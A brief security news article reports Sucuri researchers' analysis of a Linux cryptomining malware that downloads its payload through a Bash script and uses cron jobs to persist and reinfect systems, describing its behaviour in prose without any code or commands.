- The malware infects web servers and maximizes CPU usage while mining cryptocurrency.
- It uses cron commands to maintain persistence on the system even if all the malicious files and processes are removed.
A cryptomining malware was spotted by security researchers that leveraged cron scheduler. Researchers from the security firm Sucuri analyzed a Bash script linked with the malware, which downloaded its payload and configuration files into the system.
It was found that this script terminated other cryptomining processes in the infected system before running its own and used cron commands for evading detection, and reinfection.
How does it work?
- The malware infects web server and starts running cryptomining processes that maximize the CPU usage.
- The malicious payload is downloaded by a Bash script named 'cr2.sh'.
- This script killed any process associated with cryptomining including those of xmrig, cryptonight among others. It also performs many operations such as identifying the OS environment (32/64 bit) to download the appropriate payload.
- The script downloads a configuration file and a cryptominer payload.
- In the case of detection, cron commands are executed for killing the script and for redownloading it again. This way, the malware establishes persistence in the system without being detected easily.
Sucuri researchers suggest that the malware affects desktop installations on top of web servers, and advise users to stay aware of malicious cron processes.
“If you overlook a malicious cronjob, it can reinfect your environment until it’s mitigated. It’s also important to remember that it’s not just web servers that are targeted — it can also infect desktop installations of 32/64bit Linux systems and other variants, which are used to infect Windows installations,” the researchers explained.